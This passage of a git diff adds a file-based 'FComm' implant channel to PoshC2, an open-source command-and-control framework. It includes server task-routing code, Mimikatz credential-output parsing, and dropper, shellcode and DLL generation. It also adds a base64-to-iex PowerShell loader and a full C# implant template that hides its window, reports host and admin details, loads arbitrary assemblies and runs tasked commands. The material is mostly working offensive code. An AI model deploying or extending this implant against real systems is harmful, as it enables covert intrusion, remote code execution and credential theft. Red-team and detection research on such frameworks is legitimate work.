check_module_loaded("PortScanner.dll", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("run-exe sweetpotato.program "): - check_module_loaded("SweetPotato.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("SweetPotato.exe", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("run-exe sharpdpapi.program "): - check_module_loaded("SharpDPAPI.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("SharpDPAPI.exe", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("run-exe sharpchome.program "): - check_module_loaded("SharpChrome.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("SharpChrome.exe", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("run-dll pbind"): - check_module_loaded("PBind.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("PBind.exe", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("pbind-connect"): - check_module_loaded("PBind.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("PBind.exe", randomuri, user, loadmodule_command=loadmodule_command) + elif command.startswith("run-dll fcomm"): + check_module_loaded("FComm.exe", randomuri, user, loadmodule_command=loadmodule_command) + elif command.startswith("fcomm-connect"): + check_module_loaded("FComm.exe", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("run-exe-background inveigh"): - check_module_loaded("Inveigh.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("Inveigh.exe", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("run-dll pwrstatustracker"): - check_module_loaded("PwrStatusTracker.dll", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("PwrStatusTracker.dll", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("getpowerstatus"): - check_module_loaded("PwrStatusTracker.dll", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("PwrStatusTracker.dll", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("loadpowerstatus"): - check_module_loaded("PwrStatusTracker.dll", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("PwrStatusTracker.dll", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("run-exe lockless.program lockless "): - check_module_loaded("LockLess.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("LockLess.exe", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("run-exe sharpapplocker.program sharpapplocker"): - check_module_loaded("SharpApplocker.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("SharpApplocker.exe", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("run-exe sharpedrchecker.program sharpedrchecker"): - check_module_loaded("SharpEDRChecker.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("SharpEDRChecker.exe", randomuri, user, loadmodule_command=loadmodule_command) diff --git a/poshc2/server/Config.py b/poshc2/server/Config.py index 642c7f7e..3e5c1be2 100644 --- a/poshc2/server/Config.py +++ b/poshc2/server/Config.py @@ -112,6 +112,9 @@ PBindPipeName = config["PBindPipeName"] PBindSecret = config["PBindSecret"] +# FComm Options +FCommFileName = config["FCommFileName"] + # HTTP Response Options GET_404_Response = open('%sresponses/404_response.html' % ResourcesDirectory, 'r').read() diff --git a/poshc2/server/Implant.py b/poshc2/server/Implant.py index bdc65828..2dab6337 100644 --- a/poshc2/server/Implant.py +++ b/poshc2/server/Implant.py @@ -57,6 +57,8 @@ def display(self): it = self.Pivot if "pbind" in it.lower(): urlInfo = "PBind" + if "fcomm" in it.lower(): + urlInfo = "FComm" else: urlInfo = get_url_by_id(self.URLID[0]) if urlInfo is not None: @@ -134,6 +136,10 @@ def autoruns(self): update_label("Parent: %s" % self.IPAddress, self.RandomURI) #new_task("pbind-loadmodule Stage2-Core.exe", "autoruns", self.IPAddress) update_mods("Stage2-Core.exe", self.RandomURI) + if "FC" in self.Pivot: + update_label("Parent: %s" % self.IPAddress, self.RandomURI) + new_task("fcomm-loadmodule Stage2-Core.exe", "autoruns", self.RandomURI) + update_mods("Stage2-Core.exe", self.RandomURI) result = get_autoruns() if result: for autorun in result: diff --git a/poshc2/server/Tasks.py b/poshc2/server/Tasks.py index 3f89c9dd..3c83ec70 100644 --- a/poshc2/server/Tasks.py +++ b/poshc2/server/Tasks.py @@ -96,7 +96,19 @@ def newTaskOutput(uriPath, cookieVal, post_data, wsclient=False): DB.new_task("pbind-pivot-loadmodule Stage2-Core.exe", "autoruns", RandomURI) else: DB.new_task("pbind-loadmodule Stage2-Core.exe", "autoruns", RandomURI) - + + elif "fcomm-connect " in executedCmd and "FComm-Connected" in outputParsed: + outputParsed = re.search("FComm-Connected:.*", outputParsed) + outputParsed = outputParsed[0].replace("FComm-Connected: ", "") + Domain, User, Hostname, Arch, PID, Proxy = str(outputParsed).split(";") + Proxy = Proxy.replace("\x00", "") + if "\\" in User: + User = User[User.index("\\") + 1:] + newImplant = Implant(implantID, "C# FComm", str(Domain), str(User), str(Hostname), Arch, PID, None) + newImplant.save() + newImplant.display() + newImplant.autoruns() + DB.new_task("fcomm-loadmodule Stage2-Core.exe", "autoruns", RandomURI) elif executedCmd.lower().startswith("beacon "): new_sleep = executedCmd.replace('beacon ', '').strip() DB.update_sleep(new_sleep, RandomURI) @@ -210,7 +222,7 @@ def newTaskOutput(uriPath, cookieVal, post_data, wsclient=False): DB.update_task(taskId, message) print(message) - elif (executedCmd.lower().startswith("run-exe safetykatz") or "invoke-mimikatz" in executedCmd or executedCmd.lower().startswith("pbind-command") or executedCmd.lower().startswith("run-dll sharpsploit")) and "logonpasswords" in outputParsed.lower(): + elif (executedCmd.lower().startswith("run-exe safetykatz") or "invoke-mimikatz" in executedCmd or executedCmd.lower().startswith("pbind-") or executedCmd.lower().startswith("fcomm-command") or executedCmd.lower().startswith("run-dll sharpsploit")) and "logonpasswords" in outputParsed.lower(): print("Parsing Mimikatz Output") DB.update_task(taskId, outputParsed) process_mimikatz(outputParsed) @@ -243,12 +255,16 @@ def newTask(path): if (command.lower().startswith("$shellcode64")) or (command.lower().startswith("$shellcode86") or command.lower().startswith("run-exe core.program core inject-shellcode") or command.lower().startswith("run-exe pbind pbind run-exe core.program core inject-shellcode") or command.lower().startswith("pbind-command run-exe core.program core inject-shellcode") or command.lower().startswith("pbind-pivot-command run-exe core.program core inject-shellcode")): user_command = "Inject Shellcode: %s" % command[command.index("#") + 1:] command = command[:command.index("#")] - elif (command.lower().startswith('upload-file') or command.lower().startswith('pbind-command upload-file')): + elif (command.lower().startswith('upload-file') or command.lower().startswith('pbind-command upload-file') or command.lower().startswith('fcomm-command upload-file')): PBind = False + FComm = False if command.lower().startswith('pbind-command upload-file'): PBind = True + if command.lower().startswith('fcomm-command upload-file'): + FComm = True upload_args = command \ .replace('pbind-command upload-file', '') \ + .replace('fcomm-command upload-file', '') \ .replace('upload-file', '') upload_file_args_split = upload_args.split() if len(upload_file_args_split) < 2: @@ -279,6 +295,8 @@ def newTask(path): print(Colours.GREEN) if PBind: command = f"pbind-command {command}" + if FComm: + command = f"fcomm-command {command}" filehash = hashlib.md5(base64.b64decode(upload_file_bytes_b64)).hexdigest() user_command = f"Uploading file: {upload_file} to {upload_file_destination} with md5sum: {filehash}" taskId = DB.insert_task(RandomURI, user_command, user) @@ -291,7 +309,7 @@ def newTask(path): else: print("Task %s issued against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, implant.ImplantID, implant.Domain, implant.User, implant.Hostname, now.strftime("%Y-%m-%d %H:%M:%S"))) try: - if (user_command.lower().startswith("run-exe sharpwmi.program sharpwmi action=execute") or user_command.lower().startswith("pbind-command run-exe sharpwmi.program sharpwmi action=execute")): + if (user_command.lower().startswith("run-exe sharpwmi.program sharpwmi action=execute") or user_command.lower().startswith("pbind-command run-exe sharpwmi.program sharpwmi action=execute") or user_command.lower().startswith("fcomm-command run-exe sharpwmi.program sharpwmi action=execute")): print(user_command[0:200]) print("----TRUNCATED----") else: @@ -343,6 +361,15 @@ def newTask(path): print("Cannot base64 the command for PS") print(e) traceback.print_exc() + elif task[2].startswith("fcomm-command run-exe Program PS "): + try: + cmd = (task[2]).replace("fcomm-command run-exe Program PS ", "") + modulestr = base64.b64encode(cmd.encode("utf-8")).decode("utf-8") + command = "run-exe FComm.FCClass FComm run-exe Program PS %s" % modulestr + except Exception as e: + print("Cannot base64 the command for PS") + print(e) + traceback.print_exc() elif task[2].startswith("pslo "): try: module_name = (task[2]).replace("pslo ", "") @@ -381,6 +408,18 @@ def newTask(path): print("Cannot find module, loadmodule is case sensitive!") print(e) traceback.print_exc() + elif task[2].startswith("fcomm-pslo"): + try: + module_name = (task[2]).replace("fcomm-pslo ", "") + for modname in os.listdir(ModulesDirectory): + if modname.lower() in module_name.lower(): + module_name = modname + modulestr = load_module_sharp(module_name) + command = "run-exe FComm.FCClass FComm \"run-exe Program PS loadmodule%s\"" % modulestr + except Exception as e: + print("Cannot find module, loadmodule is case sensitive!") + print(e) + traceback.print_exc() elif task[2].startswith("pbind-loadmodule "): try: module_name = (task[2]).replace("pbind-loadmodule ", "") @@ -419,6 +458,37 @@ def newTask(path): command = command.replace("pbind-connect ", "run-exe PBind PBind start ") elif task[2].startswith("pbind-kill"): command = command.replace("pbind-kill", "run-exe PBind PBind kill-implant") + elif task[2].startswith("fcomm-loadmodule "): + try: + module_name = (task[2]).replace("fcomm-loadmodule ", "") + if ".exe" in module_name: + for modname in os.listdir(ModulesDirectory): + if modname.lower() in module_name.lower(): + module_name = modname + modulestr = load_module_sharp(module_name) + command = "run-exe FComm.FCClass FComm \"loadmodule%s\"" % modulestr + elif ".dll" in module_name: + for modname in os.listdir(ModulesDirectory): + if modname.lower() in module_name.lower(): + module_name = modname + modulestr = load_module_sharp(module_name) + command = "run-exe FComm.FCClass FComm \"loadmodule%s\"" % modulestr + else: + for modname in os.listdir(ModulesDirectory): + if modname.lower() in module_name.lower(): + module_name = modname + modulestr = load_module(module_name) + command = "run-exe FComm.FCClass FComm \"`$mk = '%s';[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(`$mk))|iex\"" % base64.b64encode(bytes(modulestr, "utf-8")).decode('utf-8') + except Exception as e: + print("Cannot find module, loadmodule is case sensitive!") + print(e) + traceback.print_exc() + elif task[2].startswith("fcomm-command "): + command = command.replace("fcomm-command ", "run-exe FComm.FCClass FComm ") + elif task[2].startswith("fcomm-connect"): + command = command.replace("fcomm-connect ", "run-exe FComm.FCClass FComm start ") + elif task[2].startswith("fcomm-kill"): + command = command.replace("fcomm-kill", "run-exe FComm.FCClass FComm kill-implant") elif task[2].startswith("pbind-pivot-command "): try: diff --git a/poshc2/server/payloads/Payloads.py b/poshc2/server/payloads/Payloads.py index 233dce87..d65e9ee2 100644 --- a/poshc2/server/payloads/Payloads.py +++ b/poshc2/server/payloads/Payloads.py @@ -3,7 +3,7 @@ from enum import Enum from poshc2.server.Config import PayloadsDirectory, PayloadTemplatesDirectory, DefaultMigrationProcess, PayloadModulesDirectory -from poshc2.server.Config import PBindSecret as DefaultPBindSecret, PBindPipeName as DefaultPBindPipeName, PayloadDomainCheck as DefaultPayloadDomainCheck , StageRetries, StageRetriesInitialWait, StageRetriesLimit +from poshc2.server.Config import PBindSecret as DefaultPBindSecret, PBindPipeName as DefaultPBindPipeName, PayloadDomainCheck as DefaultPayloadDomainCheck , StageRetries, StageRetriesInitialWait, StageRetriesLimit, FCommFileName as DefaultFCommFileName from poshc2.Colours import Colours from poshc2.Utils import gen_key, randomuri, formStr, offsetFinder, get_first_url, get_first_dfheader from poshc2.server.database.DB import get_url_by_id, get_default_url_id, select_item @@ -15,13 +15,14 @@ class PayloadType(Enum): PBind = "PBind_v4" Sharp = "Sharp_v4" PBindSharp = "PBindSharp_v4" + FCommSharp = "FCommSharp_v4" class Payloads(object): quickstart = None - def __init__(self, KillDate, Key, Insecure, UserAgent, Referrer, ConnectURL, BaseDirectory, URLID=None, ImplantType="", PowerShellProxyCommand="", PBindPipeName=DefaultPBindPipeName, PBindSecret=DefaultPBindSecret, PayloadDomainCheck=DefaultPayloadDomainCheck): + def __init__(self, KillDate, Key, Insecure, UserAgent, Referrer, ConnectURL, BaseDirectory, URLID=None, ImplantType="", PowerShellProxyCommand="", PBindPipeName=DefaultPBindPipeName, PBindSecret=DefaultPBindSecret, PayloadDomainCheck=DefaultPayloadDomainCheck, FCommFileName=DefaultFCommFileName): if not URLID: URLID = get_default_url_id() @@ -47,6 +48,7 @@ def __init__(self, KillDate, Key, Insecure, UserAgent, Referrer, ConnectURL, Bas self.PBindPipeName = PBindPipeName self.PBindSecret = PBindSecret self.PayloadDomainCheck = PayloadDomainCheck + self.FCommFileName = FCommFileName if FCommFileName else DefaultFCommFileName self.BaseDirectory = BaseDirectory self.StageRetries = StageRetries self.StageRetriesLimit = StageRetriesLimit @@ -153,6 +155,7 @@ def CreateDroppers(self, name=""): self.QuickstartLog(f"C# Dropper EXE written to: {self.BaseDirectory}{name}dropper_cs.exe") self.QuickstartLog(f"C# PBind Powershell v4 EXE written to: {self.BaseDirectory}{name}dropper_cs_ps_pbind_v4.exe") self.QuickstartLog(f"C# PBind Dropper EXE written to: {self.BaseDirectory}{name}pbind_cs.exe") + self.QuickstartLog(f"C# FComm Dropper EXE written to: {self.BaseDirectory}{name}fcomm_cs.exe") # Powershell (system.management.automation.dll) Dropper with open("%sSharp_Powershell_Runner.cs" % PayloadTemplatesDirectory, 'r') as f: @@ -227,6 +230,23 @@ def CreateDroppers(self, name=""): os.rename("%sPB.exe" % (self.BaseDirectory), "%s%spbind_cs.exe" % (self.BaseDirectory, name)) + # FComm CSharp Dropper + with open("%sfcomm.cs" % PayloadTemplatesDirectory, 'r') as f: + content = f.read() + + content = str(content) \ + .replace("#REPLACEKEY#", self.Key) \ + .replace("#REPLACEFCOMMFILENAME#", self.FCommFileName) + + with open("%s%sfcomm.cs" % (self.BaseDirectory, name), 'w') as f: + f.write(str(content)) + + subprocess.check_output("mono-csc %s%sfcomm.cs -out:%sFC.exe -target:exe -warn:1 -sdk:4" % (self.BaseDirectory, name, self.BaseDirectory), shell=True) + + subprocess.check_output("mono-csc %s%sfcomm.cs -out:%sFC.exe -target:exe -warn:1 -sdk:4" % (self.BaseDirectory, name, self.BaseDirectory), shell=True) + + os.rename("%sFC.exe" % (self.BaseDirectory), "%s%sfcomm_cs.exe" % (self.BaseDirectory, name)) + def PatchBytes(self, filename, dll, offset, payloadtype, name=""): filename = "%s%s" % (self.BaseDirectory, filename) with open(filename, 'wb') as f: @@ -248,6 +268,9 @@ def PatchBytes(self, filename, dll, offset, payloadtype, name=""): elif payloadtype == PayloadType.PBindSharp: srcfilename = "%s%s%s" % (self.BaseDirectory, name, "pbind_cs.exe") + elif payloadtype == PayloadType.FCommSharp: + srcfilename = "%s%s%s" % (self.BaseDirectory, name, "fcomm_cs.exe") + with open(srcfilename, "rb") as f: dllbase64 = f.read() dllbase64 = base64.b64encode(dllbase64).decode("utf-8") @@ -289,6 +312,8 @@ def CreateDlls(self, name=""): self.CreateDll(f"{name}PBind_v4_x64.dll", f"{PayloadTemplatesDirectory}Sharp_v4_x64_dll.b64", PayloadType.PBind, name) self.CreateDll(f"{name}PBindSharp_v4_x86.dll", f"{PayloadTemplatesDirectory}Sharp_v4_x86_dll.b64", PayloadType.PBindSharp, name) self.CreateDll(f"{name}PBindSharp_v4_x64.dll", f"{PayloadTemplatesDirectory}Sharp_v4_x64_dll.b64", PayloadType.PBindSharp, name) + self.CreateDll(f"{name}FCommSharp_v4_x86.dll", f"{PayloadTemplatesDirectory}Sharp_v4_x86_dll.b64", PayloadType.FCommSharp, name) + self.CreateDll(f"{name}FCommSharp_v4_x64.dll", f"{PayloadTemplatesDirectory}Sharp_v4_x64_dll.b64", PayloadType.FCommSharp, name) def CreateShellcode(self, name=""): self.QuickstartLog(Colours.END) @@ -303,6 +328,8 @@ def CreateShellcode(self, name=""): self.CreateShellcodeFile(f"{name}PBind_v4_x64_Shellcode.bin", f"{name}PBind_v4_x64_Shellcode.b64", f"{PayloadTemplatesDirectory}Sharp_v4_x64_Shellcode.b64", PayloadType.PBind, name) self.CreateShellcodeFile(f"{name}PBindSharp_v4_x86_Shellcode.bin", f"{name}PBindSharp_v4_x86_Shellcode.b64", f"{PayloadTemplatesDirectory}Sharp_v4_x86_Shellcode.b64", PayloadType.PBindSharp, name) self.CreateShellcodeFile(f"{name}PBindSharp_v4_x64_Shellcode.bin", f"{name}PBindSharp_v4_x64_Shellcode.b64", f"{PayloadTemplatesDirectory}Sharp_v4_x64_Shellcode.b64", PayloadType.PBindSharp, name) + self.CreateShellcodeFile(f"{name}FCommSharp_v4_x86_Shellcode.bin", f"{name}FCommSharp_v4_x86_Shellcode.b64", f"{PayloadTemplatesDirectory}Sharp_v4_x86_Shellcode.b64", PayloadType.FCommSharp, name) + self.CreateShellcodeFile(f"{name}FCommSharp_v4_x64_Shellcode.bin", f"{name}FCommSharp_v4_x64_Shellcode.b64", f"{PayloadTemplatesDirectory}Sharp_v4_x64_Shellcode.b64", PayloadType.FCommSharp, name) def CreateSCT(self, name=""): self.QuickstartLog(Colours.END) @@ -465,6 +492,17 @@ def CreateEXEFiles(self, sourcefile, payloadtype, name=""): hexcode = "".join("\\x{:02x}".format(c) for c in shellcodesrc) shellcode64 = formStr("char sc[]", hexcode) + elif payloadtype == PayloadType.FCommSharp: + # Get the Sharp shellcode + with open("%s%sFCommSharp_v4_x86_Shellcode.bin" % (self.BaseDirectory, name), 'rb') as f: + shellcodesrc = f.read() + hexcode = "".join("\\x{:02x}".format(c) for c in shellcodesrc) + shellcode32 = formStr("char sc[]", hexcode) + with open("%s%sFCommSharp_v4_x64_Shellcode.bin" % (self.BaseDirectory, name), 'rb') as f: + shellcodesrc = f.read() + hexcode = "".join("\\x{:02x}".format(c) for c in shellcodesrc) + shellcode64 = formStr("char sc[]", hexcode) + # Create the raw C file from the template with open("%s%s" % (PayloadTemplatesDirectory, sourcefile), 'r') as f: content = f.read() @@ -543,6 +581,11 @@ def CreateMsbuildFiles(self, payloadtype, name=""): x86base64 = f.read() with open("%s%s" % (self.BaseDirectory, name + "PBindSharp_v4_x64_Shellcode.bin"), "rb") as f: x64base64 = f.read() + elif payloadtype == PayloadType.FCommSharp: + with open("%s%s" % (self.BaseDirectory, name + "FCommSharp_v4_x86_Shellcode.bin"), "rb") as f: + x86base64 = f.read() + with open("%s%s" % (self.BaseDirectory, name + "FCommSharp_v4_x64_Shellcode.bin"), "rb") as f: + x64base64 = f.read() x86base64 = base64.b64encode(x86base64) x64base64 = base64.b64encode(x64base64) @@ -585,6 +628,11 @@ def CreateCSCFiles(self, payloadtype, name=""): x86base64 = f.read() with open("%s%s" % (self.BaseDirectory, name + "PBindSharp_v4_x64_Shellcode.bin"), "rb") as f: x64base64 = f.read() + elif payloadtype == PayloadType.FCommSharp: + with open("%s%s" % (self.BaseDirectory, name + "FCommSharp_v4_x86_Shellcode.bin"), "rb") as f: + x86base64 = f.read() + with open("%s%s" % (self.BaseDirectory, name + "FCommSharp_v4_x64_Shellcode.bin"), "rb") as f: + x64base64 = f.read() x86base64 = base64.b64encode(x86base64) x64base64 = base64.b64encode(x64base64) @@ -621,6 +669,8 @@ def CreateDonutShellcodeFile(self, payloadtype, name=""): sourcefile = "dropper_cs.exe" elif payloadtype == PayloadType.PBindSharp: sourcefile = "pbind_cs.exe" + elif payloadtype == PayloadType.FCommSharp: + sourcefile = "fcomm_cs.exe" shellcode32 = donut.create(file=f"{self.BaseDirectory}{name}{sourcefile}", arch=1) if shellcode32: diff --git a/resources/config-template.yml b/resources/config-template.yml index f84b1fb6..4854e86f 100644 --- a/resources/config-template.yml +++ b/resources/config-template.yml @@ -48,3 +48,6 @@ SocksHost: "http://127.0.0.1:49031" # PBind Options PBindPipeName: "jaccdpqnvbrrxlaf" PBindSecret: "mtkn4" + +# FComm Options +FCommFileName: "C:\\Users\\Public\\Public.ost" \ No newline at end of file diff --git a/resources/modules/FComm.exe b/resources/modules/FComm.exe new file mode 100644 index 00000000..a104cf58 Binary files /dev/null and b/resources/modules/FComm.exe differ diff --git a/resources/payload-templates/fcomm.cs b/resources/payload-templates/fcomm.cs new file mode 100755 index 00000000..bff9ded9 --- /dev/null +++ b/resources/payload-templates/fcomm.cs @@ -0,0 +1,593 @@ +using System; +using System.Diagnostics; +using System.IO; +using System.IO.Compression; +using System.Linq; +using System.Reflection; +using System.Runtime.InteropServices; +using System.Security; +using System.Security.Cryptography; +using System.Security.Principal; +using System.Text; +using System.Text.RegularExpressions; +using System.Threading; + + +public class Program +{ + public static string input; + public static bool kill; + public static string filename; + public static string encryption; + public static string output; + public static bool running; + public static bool initialised; + public static FCClient FComm; + private static StringWriter backgroundTaskOutput = new StringWriter(); + [DllImport("kernel32.dll")] + static extern IntPtr GetConsoleWindow(); + [DllImport("user32.dll")] + static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); + public const int SW_HIDEN = 0; + public const int SW_SHOW = 5; + + + public static void Sharp() + { + var handle = GetConsoleWindow(); + ShowWindow(handle, SW_HIDEN); + Program.filename = @"#REPLACEFCOMMFILENAME#"; + Program.encryption = @"#REPLACEKEY#"; + Program.kill = false; + FCommConnect(); + + } + + public static void Main() + { + Sharp(); + } + + static bool ihInteg() + { + System.Security.Principal.WindowsIdentity identity = System.Security.Principal.WindowsIdentity.GetCurrent(); + System.Security.Principal.WindowsPrincipal principal = new System.Security.Principal.WindowsPrincipal(identity); + return principal.IsInRole(System.Security.Principal.WindowsBuiltInRole.Administrator); + } + + private static void FCommConnect() + { + //initialise the implant. + + if (initialised == false) + { + string u = ""; + try + { + u = WindowsIdentity.GetCurrent().Name; + } + catch + { + u = Environment.UserName; + } + if (ihInteg()) { + u += "*"; + } + string dn = Environment.UserDomainName; + string cn = Environment.GetEnvironmentVariable("COMPUTERNAME"); + string arch = Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE"); + int pid = Process.GetCurrentProcess().Id; + Environment.CurrentDirectory = Environment.GetEnvironmentVariable("windir"); + string hostinfo = String.Format("FComm-Connected: {0};{1};{2};{3};{4};", dn, u, cn, arch, pid); + FComm = new FCClient(filename, hostinfo, encryption); + initialised = true; + + } + + try + { + running = true; + while (running) + { + if (initialised == true) + { + var output = new StringBuilder(); + + //DANGER: Removing this could end up absolutely spanking the CPU, this is effectively Beacon Time for the implant. + Thread.Sleep(5000); //fixed beacon time. + + FCDataGram Task = FComm.GetCurrentTasking(); + if (Task == null) + { + //Nothing to do. + continue; + } + + if (Task.Actioned == true) + { + //The task in the file has been actioned already. + continue; + } + + var cmd = Task.Input; + var sOutput2 = new StringWriter(); //Setup stringwriter to buffer output from command. + if (cmd.ToLower().StartsWith("kill-implant")) + { + running = false; + initialised = false; + sOutput2.WriteLine("[!] Killed Implant."); + FComm.CleanUp(); + FComm = null; + } + else if (cmd.ToLower().StartsWith("loadmodule")) + { + try + { + var module = Regex.Replace(cmd, "loadmodule", "", RegexOptions.IgnoreCase); + var assembly = Assembly.Load(Convert.FromBase64String(module)); + } + catch (Exception e) { sOutput2.WriteLine($"Error loading modules {e}"); } + sOutput2.WriteLine("Module loaded successfully"); + } + else if (cmd.ToLower().StartsWith("run-dll-background") || cmd.ToLower().StartsWith("run-exe-background")) + { + sOutput2.WriteLine("[!] This is not implemented yet in FComm implant types."); + //This might not work!? Need to consider how to approach this. + /* + Thread t = new Thread(() => RunAssembly(cmd, true)); + t.Start(); + sOutput2.WriteLine("[+] Running task in background, run get-bg to get background output."); + sOutput2.WriteLine("[*] Only run one task in the background at a time per implant."); + */ + } + else if (cmd.ToLower().StartsWith("run-dll") || cmd.ToLower().StartsWith("run-exe")) + { + var oldOutput = Console.Out; //redirecting output + Console.SetOut(sOutput2); + sOutput2.WriteLine(RunAssembly((cmd))); + Console.SetOut(oldOutput); //redirecting it back. + } + else if (cmd.ToLower() == "foo") + { + sOutput2.WriteLine("bar"); + } + else if (cmd.ToLower() == "get-bg") + { + //Removing this as Rob says this should just work, but it's not been properly tested yet. + sOutput2.WriteLine("[!] This is not implemented yet in FComm implant types."); + /* + var backgroundTaskOutputString = backgroundTaskOutput.ToString(); + if (!string.IsNullOrEmpty(backgroundTaskOutputString)) + { + output.Append(backgroundTaskOutputString); //check later. + } + else + { + sOutput2.WriteLine("[-] No output"); + }*/ + } + else + { + var oldOutput = Console.Out; + Console.SetOut(sOutput2); + sOutput2.WriteLine(RunAssembly($"run-exe Core.Program Core {cmd}")); + Console.SetOut(oldOutput); + } + + output.Append(sOutput2.ToString()); + Task.Output = Convert.ToBase64String(Encoding.UTF8.GetBytes(output.ToString())); + Task.Actioned = true; + FComm.UpdateTask(Task); + output.Clear(); + output.Length = 0; + sOutput2.Flush(); + sOutput2.Close(); + + } + } + } + + catch (Exception e) + { + Console.WriteLine("Error: " + e.Message); + Console.WriteLine(e.StackTrace); + } + } + + [DllImport("shell32.dll")] static extern IntPtr CommandLineToArgvW([MarshalAs(UnmanagedType.LPWStr)] string lpCmdLine, out int pNumArgs); + private static string[] ParseCommandLineArgs(string cl) + { + int argc; + var argv = CommandLineToArgvW(cl, out argc); + if (argv == IntPtr.Zero) + throw new System.ComponentModel.Win32Exception(); + try + { + var args = new string[argc]; + for (var i = 0; i < args.Length; i++) + { + var p = Marshal.ReadIntPtr(argv, i * IntPtr.Size); + args[i] = Marshal.PtrToStringUni(p); + } + + return args; + } + finally + { + Marshal.FreeHGlobal(argv); + } + } + + private static Type LoadAssembly(string assemblyName) + { + return Type.GetType(assemblyName, (name) => + { + return AppDomain.CurrentDomain.GetAssemblies().Where(z => z.FullName == name.FullName).LastOrDefault(); + }, null, true); + } + + private static string RunAssembly(string c, bool background = false) + { + + var oldOutput = Console.Out; + if (background) + { + backgroundTaskOutput = new StringWriter(); + Console.SetOut(backgroundTaskOutput); + } + var splitargs = c.Split(new string[] { " " }, StringSplitOptions.RemoveEmptyEntries); + int i = 0; + var sOut = ""; + string sMethod = "", sta = "", qNme = "", name = ""; + foreach (var a in splitargs) + { + if (i == 1) + qNme = a; + if (i == 2) + name = a; + if (c.ToLower().StartsWith("run-exe")) + { + if (i > 2) + sta = sta + " " + a; + } + else + { + if (i == 3) + sMethod = a; + else if (i > 3) + sta = sta + " " + a; + } + i++; + } + string[] l = ParseCommandLineArgs(sta); + var asArgs = l.Skip(1).ToArray(); + foreach (var Ass in AppDomain.CurrentDomain.GetAssemblies()) + { + if (Ass.FullName.ToString().ToLower().StartsWith(name.ToLower())) + { + var lTyp = LoadAssembly(qNme + ", " + Ass.FullName); + try + { + if (c.ToLower().StartsWith("run-exe")) + { + object output = null; + output = lTyp.Assembly.EntryPoint.Invoke(null, new object[] { asArgs }); + if (output != null) + { + sOut = output.ToString(); + } + } + else + { + try + { + object output = null; + output = lTyp.Assembly.GetType(qNme).InvokeMember(sMethod, BindingFlags.Public | BindingFlags.InvokeMethod | BindingFlags.Static, null, null, asArgs).ToString(); + if (output != null) + { + sOut = output.ToString(); + } + } + catch + { + object output = null; + output = lTyp.Assembly.GetType(qNme).InvokeMember(sMethod, BindingFlags.Public | BindingFlags.InvokeMethod | BindingFlags.Static, null, null, null).ToString(); + if (output != null) + { + sOut = output.ToString(); + } + } + } + } + catch (Exception e) + { + Console.WriteLine("RAsm Exception: " + e.Message); + Console.WriteLine(e.StackTrace); + } + break; + } + } + if (background) + { + Console.SetOut(oldOutput); + backgroundTaskOutput.WriteLine(sOut); + } + return sOut; + } + + +} + + +public class FCDataGram +{ + public string PacketType { get; set; } + public string Input { get; set; } + public string Output { get; set; } + public bool Actioned { get; set; } + public bool Retrieved { get; set; } + + public FCDataGram() + { + Actioned = false; + Retrieved = false; + } + + public FCDataGram(string[] objContents) + { + PacketType = objContents[0]; + Input = objContents[1]; + Output = objContents[2]; + Actioned = bool.Parse(objContents[3]); + Retrieved = bool.Parse(objContents[4]); + } + + public FCDataGram(string objContents) + { + char[] delim = { ',' }; + FromStringArray(objContents.Split(delim)); + } + + public override string ToString() + { + return string.Join(",", ToStringArray()); + } + + public string[] ToStringArray() + { + return new string[] { PacketType, Input, Output, Actioned.ToString(), Retrieved.ToString() }; + } + + public void FromStringArray(string[] objContents) + { + PacketType = objContents[0]; + Input = objContents[1]; + Output = objContents[2]; + Actioned = bool.Parse(objContents[3]); + Retrieved = bool.Parse(objContents[4]); + } +} + +public class FCClient +{ + //Client is the far end of this connection. + private string FilePath; + private string Key; + public FCClient(string FilePath_In, string HostInfo, string key) + { + //initialise object. + try + { + FilePath = FilePath_In; + Key = key; + string path = Path.GetDirectoryName(FilePath_In); + string filename = Path.GetFileName(FilePath_In); + Directory.CreateDirectory(path); //Create the full path if it doesn't exist. + var f = File.Create(FilePath_In); //create the file if it doesn't exist. Probably worth putting more sanity checks here. + f.Close(); + f.Dispose(); + //lets populate it with the info we need. + FCDataGram InitialContent = new FCDataGram() { PacketType = "INIT", Input = "initial", Output = Convert.ToBase64String(Encoding.UTF8.GetBytes(HostInfo)), Actioned = true }; + SendData(InitialContent); + } + catch (SecurityException e) + { 